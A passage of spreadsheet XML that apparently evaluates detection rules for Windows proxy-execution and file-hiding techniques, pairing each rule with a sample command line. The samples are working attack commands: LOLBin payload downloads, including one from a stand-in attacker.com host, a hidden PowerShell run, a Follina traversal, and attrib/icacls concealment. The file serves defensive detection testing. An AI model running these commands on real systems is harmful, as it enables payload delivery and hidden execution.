      <c r="K2730" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2731" ht="15.75" customHeight="1" s="42">
      <c r="A2731" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2731" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C2731" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D2731" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E2731" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'</t>
        </is>
      </c>
      <c r="F2731" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2731" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2731" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J2731" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2731" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2732" ht="15.75" customHeight="1" s="42">
      <c r="A2732" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2732" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C2732" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D2732" s="43" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E2732" s="43" t="inlineStr">
        <is>
          <t>iexpress.exe /n/q/m C:\\Windows\\Temp\\config.sed</t>
        </is>
      </c>
      <c r="F2732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2732" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J2732" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2732" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2733" ht="15.75" customHeight="1" s="42">
      <c r="A2733" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2733" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C2733" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D2733" s="43" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E2733" s="43" t="inlineStr">
        <is>
          <t>iexpress.exe /n /q /m C:\\Users\\Public\\Documents\\config.sed</t>
        </is>
      </c>
      <c r="F2733" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2733" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2733" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J2733" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2733" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2734" ht="15.75" customHeight="1" s="42">
      <c r="A2734" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2734" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C2734" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D2734" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E2734" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\System32\\IME\\SHARED\\IMEWDBLD.exe" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F2734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2734" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J2734" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2734" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2735" ht="15.75" customHeight="1" s="42">
      <c r="A2735" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2735" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C2735" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D2735" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E2735" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe /n 1 calc.exe</t>
        </is>
      </c>
      <c r="F2735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2735" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary (cec8e918-30f7-4e2d-9bfa-a59cc97ae60f)</t>
        </is>
      </c>
      <c r="J2735" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2735" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2736" ht="15.75" customHeight="1" s="42">
      <c r="A2736" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2736" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C2736" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2736" s="43" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E2736" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe /c calc.exe</t>
        </is>
      </c>
      <c r="F2736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2736" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2736" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2736" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary (cec8e918-30f7-4e2d-9bfa-a59cc97ae60f)</t>
        </is>
      </c>
      <c r="J2736" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2736" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2737" ht="15.75" customHeight="1" s="42">
      <c r="A2737" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2737" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C2737" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2737" s="43" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E2737" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe -c calc.exe</t>
        </is>
      </c>
      <c r="F2737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2737" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2737" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J2737" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2737" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2738" ht="15.75" customHeight="1" s="42">
      <c r="A2738" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2738" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C2738" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2738" s="43" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E2738" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe ^/c calc.exe</t>
        </is>
      </c>
      <c r="F2738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2738" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2738" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina (6004abd0-afa4-4557-ba90-49d172e0a299)</t>
        </is>
      </c>
      <c r="J2738" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2738" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2739" ht="15.75" customHeight="1" s="42">
      <c r="A2739" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2739" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C2739" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D2739" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E2739" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..\..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F2739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2739" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2739" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813)</t>
        </is>
      </c>
      <c r="J2739" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2739" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2740" ht="15.75" customHeight="1" s="42">
      <c r="A2740" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2740" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C2740" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D2740" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E2740" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..%2F..%2F..%2FWINDOWS%2Fsystem32%2Fcalc.exe"</t>
        </is>
      </c>
      <c r="F2740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2740" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2740" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2740" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2740" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2741" ht="15.75" customHeight="1" s="42">
      <c r="A2741" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2741" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C2741" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D2741" s="43" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E2741" s="43" t="inlineStr">
        <is>
          <t>rasautou.exe -d test.dll -pDllMain</t>
        </is>
      </c>
      <c r="F2741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2741" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2741" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J2741" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2741" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2742" ht="15.75" customHeight="1" s="42">
      <c r="A2742" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2742" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C2742" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D2742" s="43" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E2742" s="43" t="inlineStr">
        <is>
          <t>rasautou.exe -p DllMain -d test.dll</t>
        </is>
      </c>
      <c r="F2742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2742" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2742" s="43" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J2742" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2742" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2743" ht="15.75" customHeight="1" s="42">
      <c r="A2743" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2743" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C2743" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D2743" s="43" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E2743" s="43" t="inlineStr">
        <is>
          <t>rasautou.exe -d"test.dll" -p"DllMain"</t>
        </is>
      </c>
      <c r="F2743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2743" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2743" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); REGISTER_APP.VBS Proxy Execution (1c8774a0-44d4-4db0-91f8-e792359c70bd); Potential Register_App.Vbs LOLScript Abuse (28c8f68b-098d-45af-8d43-8089f3e35403)</t>
        </is>
      </c>
      <c r="J2743" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2743" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2744" ht="15.75" customHeight="1" s="42">
      <c r="A2744" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2744" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C2744" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D2744" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E2744" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe -appvscript calc.exe</t>
        </is>
      </c>
      <c r="F2744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2744" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2744" s="43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J2744" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2744" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2745" ht="15.75" customHeight="1" s="42">
      <c r="A2745" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2745" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C2745" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D2745" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E2745" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe /appvscript calc.exe</t>
        </is>
      </c>
      <c r="F2745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2745" s="43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J2745" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2745" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2746" ht="15.75" customHeight="1" s="42">
      <c r="A2746" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2746" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C2746" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D2746" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E2746" s="43" t="inlineStr">
        <is>
          <t>mofcomp.exe -N:root\subscription "C:\Users\Public\malicious.mof"</t>
        </is>
      </c>
      <c r="F2746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2746" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J2746" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2746" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2747" ht="15.75" customHeight="1" s="42">
      <c r="A2747" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2747" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C2747" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D2747" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E2747" s="43" t="inlineStr">
        <is>
          <t>copy mofcomp.exe not_mof.exe &amp;&amp; not_mof.exe C:\Windows\Tasks\malicious.mof</t>
        </is>
      </c>
      <c r="F2747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2747" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2747" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J2747" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2747" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2748" ht="15.75" customHeight="1" s="42">
      <c r="A2748" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2748" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C2748" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D2748" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E2748" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F2748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2748" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2748" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J2748" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2748" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2749" ht="15.75" customHeight="1" s="42">
      <c r="A2749" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2749" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C2749" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D2749" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E2749" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe "http://attacker.com/payload.exe"</t>
        </is>
      </c>
      <c r="F2749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2749" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2749" s="43" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J2749" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2749" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2750" ht="15.75" customHeight="1" s="42">
      <c r="A2750" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2750" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2750" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2750" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2750" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +h "C:\Users\thaim\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt"</t>
        </is>
      </c>
      <c r="F2750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2750" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe (4281cb20-2994-4580-aa63-c8b86d019934)</t>
        </is>
      </c>
      <c r="J2750" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2750" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2751" ht="15.75" customHeight="1" s="42">
      <c r="A2751" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2751" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2751" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2751" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2751" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +h C:\Users\thaim\AppData\Local\Temp\T1222.001_attrib_2\T1222.001_attrib1.txt /Q</t>
        </is>
      </c>
      <c r="F2751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2751" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b); Hiding Files with Attrib.exe (4281cb20-2994-4580-aa63-c8b86d019934)</t>
        </is>
      </c>
      <c r="J2751" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2751" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2752" ht="15.75" customHeight="1" s="42">
      <c r="A2752" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2752" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2752" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2752" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2752" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +s payload.exe</t>
        </is>
      </c>
      <c r="F2752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2752" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b)</t>
        </is>
      </c>
      <c r="J2752" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2752" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2753" ht="15.75" customHeight="1" s="42">
      <c r="A2753" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2753" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2753" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2753" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2753" s="43" t="inlineStr">
        <is>
          <t>attrib.exe +system "C:\ProgramData\hidden_script.bat"</t>
        </is>
      </c>
      <c r="F2753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2753" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b)</t>
        </is>
      </c>
      <c r="J2753" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2753" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2754" ht="15.75" customHeight="1" s="42">
      <c r="A2754" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2754" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2754" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2754" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2754" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F2754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2754" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J2754" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2754" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2755" ht="15.75" customHeight="1" s="42">
      <c r="A2755" s="43" t="inlineStr">
        <is>
